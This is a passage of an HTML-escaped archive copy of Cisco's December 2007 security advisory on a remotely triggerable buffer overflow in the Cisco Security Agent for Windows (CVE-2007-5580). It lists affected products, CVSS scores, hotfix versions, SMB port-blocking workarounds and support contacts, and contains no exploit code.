&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/warp/public/707/cisco-sa-20071205-csa.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/707/cisco-sa-20071205-csa.shtml&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Affected Products
&lt;br&gt;=================
&lt;br&gt;&lt;br&gt;Vulnerable Products
&lt;br&gt;+------------------
&lt;br&gt;&lt;br&gt;All versions of Cisco Security Agent for Windows, either managed
&lt;br&gt;or standalone, are affected. Agents that are running on Cisco IP
&lt;br&gt;Communications application servers or agents on systems that are running
&lt;br&gt;the Cisco Security Manager are examples of a standalone implementation.
&lt;br&gt;&lt;br&gt;Standalone agents are installed in the following Cisco IP Communications
&lt;br&gt;products:
&lt;br&gt;&lt;br&gt;&amp;nbsp; * Cisco Unified Communications Manager (CallManager)
&lt;br&gt;&amp;nbsp; * Cisco Conference Connection (CCC)
&lt;br&gt;&amp;nbsp; * Emergency Responder
&lt;br&gt;&amp;nbsp; * IPCC Express
&lt;br&gt;&amp;nbsp; * IPCC Enterprise
&lt;br&gt;&amp;nbsp; * IPCC Hosted
&lt;br&gt;&amp;nbsp; * IP Interactive Voice Response (IP IVR)
&lt;br&gt;&amp;nbsp; * IP Queue Manager
&lt;br&gt;&amp;nbsp; * Intelligent Contact Management (ICM)
&lt;br&gt;&amp;nbsp; * Cisco Voice Portal (CVP)
&lt;br&gt;&amp;nbsp; * Cisco Unified Meeting Place
&lt;br&gt;&amp;nbsp; * Cisco Personal Assistant (PA)
&lt;br&gt;&amp;nbsp; * Cisco Unity
&lt;br&gt;&amp;nbsp; * Cisco Unity Connection
&lt;br&gt;&amp;nbsp; * Cisco Unity Bridge
&lt;br&gt;&amp;nbsp; * Cisco Internet Service Node (ISN)
&lt;br&gt;&lt;br&gt;Cisco Security Manager installs a standalone version of Cisco Security
&lt;br&gt;Agent if an agent is not found when Cisco Security Manager is installed,
&lt;br&gt;so systems that are running Cisco Security Manager are also affected by
&lt;br&gt;this vulnerability.
&lt;br&gt;&lt;br&gt;Products Confirmed Not Vulnerable
&lt;br&gt;+--------------------------------
&lt;br&gt;&lt;br&gt;The Cisco Secure Access Control Server (ACS) Solution Engine, also
&lt;br&gt;known as the ACS appliance, integrates a standalone version of Cisco
&lt;br&gt;Security Agent. However, the ACS Solution Engine is not affected by
&lt;br&gt;this vulnerability because by default it blocks incoming traffic to
&lt;br&gt;the affected TCP ports (139 and 445). Additional information is in the
&lt;br&gt;Details section.
&lt;br&gt;&lt;br&gt;Cisco Security Agents that are running on the Solaris and Linux
&lt;br&gt;operating systems are not affected by the vulnerability described in
&lt;br&gt;this advisory.
&lt;br&gt;&lt;br&gt;No other Cisco products are currently known to be affected by this
&lt;br&gt;vulnerability.
&lt;br&gt;&lt;br&gt;Details
&lt;br&gt;=======
&lt;br&gt;&lt;br&gt;Cisco Security Agent is a security software agent that provides threat
&lt;br&gt;protection for server and desktop computing systems. Cisco Security
&lt;br&gt;Agents can be managed by a Management Center for Cisco Security Agents
&lt;br&gt;or can be standalone agents that are not managed by a Cisco Security
&lt;br&gt;Agent Management Center.
&lt;br&gt;&lt;br&gt;Some Cisco products integrate standalone Cisco Security Agents to
&lt;br&gt;protect the products against viruses, worms, and attacks. Examples of
&lt;br&gt;products that integrate standalone Cisco Security Agents include Cisco
&lt;br&gt;IP Communications application servers, the Cisco Secure Access Control
&lt;br&gt;Server (ACS) Solution Engine, and the Cisco Security Manager.
&lt;br&gt;&lt;br&gt;A buffer overflow vulnerability exists in a system driver used by Cisco
&lt;br&gt;Security Agents, whether they are managed or unmanaged. Cisco Security
&lt;br&gt;Agents use this driver by default.
&lt;br&gt;&lt;br&gt;Windows kernel memory becomes corrupted when this buffer is overflowed.
&lt;br&gt;Therefore, exploitation of this vulnerability will lead to a Windows
&lt;br&gt;stop error (kernel panic, or blue screen error), or to arbitrary code
&lt;br&gt;execution. The vulnerability can be exploited remotely via the network.
&lt;br&gt;&lt;br&gt;The vulnerability is triggered when Cisco Security Agent is processing
&lt;br&gt;a crafted TCP segment destined to TCP port 139 or 445. These ports are
&lt;br&gt;used by the Microsoft Server Message Block (SMB) protocol. A TCP session
&lt;br&gt;needs to be established (that is, the TCP three-way handshake needs to
&lt;br&gt;be completed) for the vulnerability to be triggered.
&lt;br&gt;&lt;br&gt;All systems that are running a vulnerable version of Cisco Security
&lt;br&gt;Agent for Windows are affected. This includes Cisco products that
&lt;br&gt;integrate standalone Cisco Security Agents, such as Cisco IP
&lt;br&gt;Communications applications servers and the Cisco Security Manager.
&lt;br&gt;Although the ACS Solution Engine integrates a standalone Cisco Security
&lt;br&gt;Agent, it is not affected because TCP ports 139 and 445 have been
&lt;br&gt;firewalled by the ACS Solution Engine itself. This blocking of traffic
&lt;br&gt;destined to TCP ports 139 and 445 is enabled by default and is not
&lt;br&gt;user-configurable.
&lt;br&gt;&lt;br&gt;This vulnerability is documented in Cisco bug ID CSCsl00618.
&lt;br&gt;&lt;br&gt;The CVE identifier CVE-2007-5580 has been assigned to this
&lt;br&gt;vulnerability.
&lt;br&gt;&lt;br&gt;Vulnerability Scoring Details
&lt;br&gt;+----------------------------
&lt;br&gt;&lt;br&gt;Cisco has provided scores for the vulnerability in this advisory based
&lt;br&gt;on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
&lt;br&gt;this Security Advisory is done in accordance with CVSS version 2.0.
&lt;br&gt;&lt;br&gt;CVSS is a standards-based scoring method that conveys vulnerability
&lt;br&gt;severity and helps determine urgency and priority of response.
&lt;br&gt;&lt;br&gt;Cisco has provided a base and temporal score. Customers can then
&lt;br&gt;compute environmental scores to assist in determining the impact of the
&lt;br&gt;vulnerability in individual networks.
&lt;br&gt;&lt;br&gt;Cisco has provided a FAQ to answer additional questions regarding CVSS
&lt;br&gt;at
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Cisco has also provided a CVSS calculator to help compute the
&lt;br&gt;environmental impact for individual networks at
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://intellishield.cisco.com/security/alertmanager/cvss&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://intellishield.cisco.com/security/alertmanager/cvss&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;* Buffer overflow in system driver causes BSOD (CSCsl00618)
&lt;br&gt;&lt;br&gt;CVSS Base Score - 10.0
&lt;br&gt;&amp;nbsp; &amp;nbsp; Access Vector - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Network
&lt;br&gt;&amp;nbsp; &amp;nbsp; Access Complexity - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Low
&lt;br&gt;&amp;nbsp; &amp;nbsp; Authentication - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; None
&lt;br&gt;&amp;nbsp; &amp;nbsp; Confidentiality Impact - &amp;nbsp; Complete
&lt;br&gt;&amp;nbsp; &amp;nbsp; Integrity Impact - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Complete
&lt;br&gt;&amp;nbsp; &amp;nbsp; Availability Impact - &amp;nbsp; &amp;nbsp; &amp;nbsp;Complete
&lt;br&gt;&lt;br&gt;CVSS Temporal Score - 8.3
&lt;br&gt;&amp;nbsp; &amp;nbsp; Exploitability - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Functional
&lt;br&gt;&amp;nbsp; &amp;nbsp; Remediation Level - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Official-Fix
&lt;br&gt;&amp;nbsp; &amp;nbsp; Report Confidence - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Confirmed
&lt;br&gt;&lt;br&gt;Impact
&lt;br&gt;======
&lt;br&gt;&lt;br&gt;Successful exploitation of the buffer overflow vulnerability described
&lt;br&gt;in this advisory may result in an operating system crash or complete
&lt;br&gt;system compromise.
&lt;br&gt;&lt;br&gt;Software Versions and Fixes
&lt;br&gt;===========================
&lt;br&gt;&lt;br&gt;When considering software upgrades, also consult
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/go/psirt&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/go/psirt&lt;/a&gt;&amp;nbsp;and any subsequent advisories to determine
&lt;br&gt;exposure and a complete upgrade solution.
&lt;br&gt;&lt;br&gt;In all cases, customers should exercise caution to be certain the
&lt;br&gt;devices to be upgraded contain sufficient memory and that current
&lt;br&gt;hardware and software configurations will continue to be supported
&lt;br&gt;properly by the new release. If the information is not clear, contact
&lt;br&gt;the Cisco Technical Assistance Center (TAC) or your contracted
&lt;br&gt;maintenance provider for assistance.
&lt;br&gt;&lt;br&gt;Managed Cisco Security Agents
&lt;br&gt;+----------------------------
&lt;br&gt;&lt;br&gt;Fixed software for managed Cisco Security Agents is available in the
&lt;br&gt;form of hotfixes. The following table contains hotfix information for
&lt;br&gt;the current supported versions of Cisco Security Agent. Future versions
&lt;br&gt;of Cisco Security Agent will have the fix included.
&lt;br&gt;&lt;br&gt;+----------------------------------------+
&lt;br&gt;| Affected Cisco Security &amp;nbsp;| &amp;nbsp; Hotfix &amp;nbsp; &amp;nbsp;|
&lt;br&gt;| &amp;nbsp; &amp;nbsp; &amp;nbsp;Agent Version &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; Version &amp;nbsp; |
&lt;br&gt;|--------------------------+-------------|
&lt;br&gt;| 4.5.1 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| Hotfix &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| 4.5.1.672 &amp;nbsp; |
&lt;br&gt;|--------------------------+-------------|
&lt;br&gt;| 5.0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| Hotfix &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| 5.0.0.225 &amp;nbsp; |
&lt;br&gt;|--------------------------+-------------|
&lt;br&gt;| 5.1 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| Hotfix &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| 5.1.0.106 &amp;nbsp; |
&lt;br&gt;|--------------------------+-------------|
&lt;br&gt;| 5.2 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| Hotfix &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| 5.2.0.238 &amp;nbsp; |
&lt;br&gt;+----------------------------------------+
&lt;br&gt;&lt;br&gt;Cisco Security Agent hotfixes can be downloaded from the following
&lt;br&gt;location:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/cgi-bin/tablebuild.pl/csahf-crypto?psrtdcat20e2&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/cgi-bin/tablebuild.pl/csahf-crypto?psrtdcat20e2&lt;/a&gt;&lt;br&gt;&lt;br&gt;Cisco Security Agent for Cisco IP Communications Products
&lt;br&gt;+--------------------------------------------------------
&lt;br&gt;&lt;br&gt;The following table contains information about Cisco Security Agent
&lt;br&gt;fixes for Cisco IP Communications products:
&lt;br&gt;&lt;br&gt;+--------------------------------------------+
&lt;br&gt;| Affected | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;| &amp;nbsp;Cisco &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;| Security | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Fixed Software &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;| &amp;nbsp;Agent &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;| Version &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;|----------+---------------------------------|
&lt;br&gt;| 4.5.1 &amp;nbsp; &amp;nbsp;| CUCM-CSA-4.5.1.672-2.0.7-k9.exe |
&lt;br&gt;|----------+---------------------------------|
&lt;br&gt;| 5.0 &amp;nbsp; &amp;nbsp; &amp;nbsp;| CUCM-CSA-5.0.0.225-3.0.7-k9.exe |
&lt;br&gt;+--------------------------------------------+
&lt;br&gt;&lt;br&gt;These fixes can be downloaded from the following location:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/cgi-bin/tablebuild.pl/cmva-3des?psrtdcat20e2&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/cgi-bin/tablebuild.pl/cmva-3des?psrtdcat20e2&lt;/a&gt;&lt;br&gt;&lt;br&gt;Cisco Security Agent for Cisco Security Manager
&lt;br&gt;+----------------------------------------------
&lt;br&gt;&lt;br&gt;A fixed standalone Cisco Security Agent for the Cisco
&lt;br&gt;Security Manager is provided in the form of the hotfix
&lt;br&gt;fcs-csamc-hotfix-5.2.0.238-w2k3-k9-CSM.zip, which is available for
&lt;br&gt;download from:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/cgi-bin/tablebuild.pl/csm-app?psrtdcat20e2&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/cgi-bin/tablebuild.pl/csm-app?psrtdcat20e2&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Workarounds
&lt;br&gt;===========
&lt;br&gt;&lt;br&gt;General Considerations
&lt;br&gt;+---------------------
&lt;br&gt;&lt;br&gt;Filters that deny SMB protocol packets using TCP ports 139 and 445
&lt;br&gt;should be deployed as part of a transit access control list (tACL)
&lt;br&gt;policy for protection from traffic that enters the network at ingress
&lt;br&gt;access points. This policy should be configured to protect the network
&lt;br&gt;device where the filter is applied and other devices behind it. Filters
&lt;br&gt;for SMB protocol packets using TCP ports 139 and 445 should also be
&lt;br&gt;deployed in front of vulnerable hosts so that traffic is allowed only
&lt;br&gt;from trusted clients.
&lt;br&gt;&lt;br&gt;Additional information about tACLs is available in &amp;quot;Transit Access
&lt;br&gt;Control Lists : Filtering at Your Edge&amp;quot;:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml&lt;/a&gt;&lt;br&gt;&lt;br&gt;Additional mitigation techniques that can be deployed on Cisco devices
&lt;br&gt;within the network are available in the Cisco Applied Mitigation
&lt;br&gt;Bulletin companion document for this advisory:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/warp/public/707/cisco-amb-20071205-csa.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/707/cisco-amb-20071205-csa.shtml&lt;/a&gt;&lt;br&gt;&lt;br&gt;Cisco Security Agent Rule to Block TCP Port 139 and 445 Traffic
&lt;br&gt;+--------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Workstations that do not have a need to provide SMB services, such as
&lt;br&gt;services for sharing directories or files and printers, can be protected
&lt;br&gt;by configuring a Cisco Security Agent rule that blocks all traffic to
&lt;br&gt;TCP ports 139 and 445 (the SMB ports).
&lt;br&gt;&lt;br&gt;Such a rule exists in versions of Cisco Security Agent that include
&lt;br&gt;the Network Personal Firewall policy. The specific rule can be found
&lt;br&gt;by searching rules for one that has the description &amp;quot;All applications,
&lt;br&gt;server for SMB services (offering network shares)&amp;quot; or by opening the
&lt;br&gt;Personal Firewall Module rule module (attached to the Network Personal
&lt;br&gt;Firewall policy) and editing the rule that has this description. This
&lt;br&gt;rule is enabled by default but the default action must be changed from
&lt;br&gt;Allow to a High Priority Deny.
&lt;br&gt;&lt;br&gt;If the Network Personal Firewall policy is not available, administrators
&lt;br&gt;can create a network access rule that blocks traffic to TCP ports 139
&lt;br&gt;and 445. To do this, the rule must be configured as a Deny rule so
&lt;br&gt;traffic is denied when the system on which Cisco Security Agent is
&lt;br&gt;installed attempts to act as a server for network services on ports TCP
&lt;br&gt;139 and 445. For additional information on configuring Cisco Security
&lt;br&gt;Agent network access control rules, reference the following document:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/en/US/docs/security/csa/csa52/user_guide/Chap6.html#wp1199624&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/en/US/docs/security/csa/csa52/user_guide/Chap6.html#wp1199624&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Caution: Blocking TCP ports 139 and 445 on a Windows system will cause
&lt;br&gt;the Windows system to stop providing SMB services. Before implementing
&lt;br&gt;the workarounds presented in this section, administrators are advised to
&lt;br&gt;ensure that they understand the implications of disabling SMB services
&lt;br&gt;on users' workstations.
&lt;br&gt;&lt;br&gt;Obtaining Fixed Software
&lt;br&gt;========================
&lt;br&gt;&lt;br&gt;Cisco has released free software updates that address these
&lt;br&gt;vulnerabilities. Prior to deploying software, customers should consult
&lt;br&gt;their maintenance provider or check the software for feature set
&lt;br&gt;compatibility and known issues specific to their environment.
&lt;br&gt;&lt;br&gt;Customers may only install and expect support for the feature
&lt;br&gt;sets they have purchased. By installing, downloading, accessing
&lt;br&gt;or otherwise using such software upgrades, customers agree to be
&lt;br&gt;bound by the terms of Cisco's software license terms found at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html&lt;/a&gt;,
&lt;br&gt;or as otherwise set forth at Cisco.com Downloads at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/public/sw-center/sw-usingswc.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/public/sw-center/sw-usingswc.shtml&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Do not contact &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14179910&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;psirt@...&lt;/a&gt; or &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14179910&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security-alert@...&lt;/a&gt; for software
&lt;br&gt;upgrades.
&lt;br&gt;&lt;br&gt;Customers with Service Contracts
&lt;br&gt;+-------------------------------
&lt;br&gt;&lt;br&gt;Customers with contracts should obtain upgraded software through their
&lt;br&gt;regular update channels. For most customers, this means that upgrades
&lt;br&gt;should be obtained through the Software Center on Cisco's worldwide
&lt;br&gt;website at &lt;a href=&quot;http://www.cisco.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Customers using Third Party Support Organizations
&lt;br&gt;+------------------------------------------------
&lt;br&gt;&lt;br&gt;Customers whose Cisco products are provided or maintained through prior
&lt;br&gt;or existing agreements with third-party support organizations, such
&lt;br&gt;as Cisco Partners, authorized resellers, or service providers should
&lt;br&gt;contact that support organization for guidance and assistance with the
&lt;br&gt;appropriate course of action in regards to this advisory.
&lt;br&gt;&lt;br&gt;The effectiveness of any workaround or fix is dependent on specific
&lt;br&gt;customer situations, such as product mix, network topology, traffic
&lt;br&gt;behavior, and organizational mission. Due to the variety of affected
&lt;br&gt;products and releases, customers should consult with their service
&lt;br&gt;provider or support organization to ensure any applied workaround or fix
&lt;br&gt;is the most appropriate for use in the intended network before it is
&lt;br&gt;deployed.
&lt;br&gt;&lt;br&gt;Customers without Service Contracts
&lt;br&gt;+----------------------------------
&lt;br&gt;&lt;br&gt;Customers who purchase direct from Cisco but do not hold a Cisco service
&lt;br&gt;contract, and customers who purchase through third-party vendors but are
&lt;br&gt;unsuccessful in obtaining fixed software through their point of sale
&lt;br&gt;should acquire upgrades by contacting the Cisco Technical Assistance
&lt;br&gt;Center (TAC). TAC contacts are as follows:
&lt;br&gt;&lt;br&gt;&amp;nbsp; * +1 800 553 2447 (toll free from within North America)
&lt;br&gt;&amp;nbsp; * +1 408 526 7209 (toll call from anywhere in the world)
&lt;br&gt;&amp;nbsp; * e-mail: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14179910&amp;i=2&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;tac@...&lt;/a&gt;
&lt;br&gt;&lt;br&gt;Customers should have their product serial number available and be
&lt;br&gt;prepared to give the URL of this notice as evidence of entitlement to a
&lt;br&gt;free upgrade. Free upgrades for non-contract customers must be requested
&lt;br&gt;through the TAC.
&lt;br&gt;&lt;br&gt;Refer to &lt;a href=&quot;http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml&lt;/a&gt;&lt;br&gt;for additional TAC contact information, including localized telephone
&lt;br&gt;numbers, and instructions and e-mail addresses for use in various
&lt;br&gt;languages.
&lt;br&gt;&lt;br&gt;Exploitation and Public Announcements
&lt;br&gt;=====================================
&lt;br&gt;&lt;br&gt;The Cisco PSIRT is not aware of any public announcements or malicious
&lt;br&gt;use of the vulnerability described in this advisory.
&lt;br&gt;&lt;br&gt;This vulnerability was reported to Cisco by the NSFocus Security Team
&lt;br&gt;(&lt;a href=&quot;http://www.nsfocus.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.nsfocus.com&lt;/a&gt;). Cisco would like to thank the NSFocus Security
&lt;br&gt;Team for reporting this vulnerability and working with us towards
&lt;br&gt;resolution of this problem.
&lt;br&gt;&lt;br&gt;Status of this Notice: FINAL
&lt;br&gt;============================
&lt;br&gt;&lt;br&gt;THIS DOCUMENT IS PROVIDED ON AN &amp;quot;AS IS&amp;quot; BASIS AND DOES NOT IMPLY
&lt;br&gt;ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
&lt;br&gt;MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
&lt;br&gt;INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
&lt;br&gt;AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
&lt;br&gt;DOCUMENT AT ANY TIME.
&lt;br&gt;&lt;br&gt;A stand-alone copy or Paraphrase of the text of this document that omits
&lt;br&gt;the distribution URL in the following section is an uncontrolled copy,
&lt;br&gt;and may lack important information or contain factual errors.
&lt;br&gt;&lt;br&gt;Distribution
&lt;br&gt;============
&lt;br&gt;&lt;br&gt;This advisory is posted on Cisco's worldwide website at:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/warp/public/707/cisco-sa-20071205-csa.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/707/cisco-sa-20071205-csa.shtml&lt;/a&gt;&lt;br&gt;&lt;br&gt;In addition to worldwide web posting, a text version of this notice is
&lt;br&gt;clear-signed with the Cisco PSIRT PGP key and is posted to the following
&lt;br&gt;e-mail and Usenet news recipients.
&lt;br&gt;&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14179910&amp;i=3&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;cust-security-announce@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14179910&amp;i=4&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;first-teams@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14179910&amp;i=5&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;bugtraq@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14179910&amp;i=6&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;vulnwatch@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14179910&amp;i=7&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;cisco@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14179910&amp;i=8&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;cisco-nsp@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14179910&amp;i=9&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;full-disclosure@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14179910&amp;i=10&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;comp.dcom.sys.cisco@...&lt;/a&gt;
&lt;br&gt;&lt;br&gt;Future updates of this advisory, if any, will be placed on Cisco's
&lt;br&gt;worldwide website, but may or may not be actively announced on mailing
&lt;br&gt;lists or newsgroups. Users concerned about this problem are encouraged
&lt;br&gt;to check the above URL for any updates.
&lt;br&gt;&lt;br&gt;Revision History
&lt;br&gt;================
&lt;br&gt;&lt;br&gt;+-------------------------------------------------------------+
&lt;br&gt;| Revision 1.0 | 2007-December-05 &amp;nbsp;| Initial public release. &amp;nbsp;|
&lt;br&gt;+-------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;Cisco Security Procedures
&lt;br&gt;=========================
&lt;br&gt;&lt;br&gt;Complete information on reporting security vulnerabilities
&lt;br&gt;in Cisco products, obtaining assistance with security
&lt;br&gt;incidents, and registering to receive security information
&lt;br&gt;from Cisco, is available on Cisco's worldwide website at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html&lt;/a&gt;.
&lt;br&gt;&amp;nbsp;This includes instructions for press inquiries regarding
&lt;br&gt;Cisco security notices. All Cisco security advisories are available at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/go/psirt&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/go/psirt&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;+--------------------------------------------------------------------
&lt;br&gt;All contents are Copyright (C) 2006-2007 Cisco Systems, Inc. All rights
&lt;br&gt;reserved.
&lt;br&gt;+--------------------------------------------------------------------
&lt;br&gt;&lt;br&gt;-----BEGIN PGP SIGNATURE-----
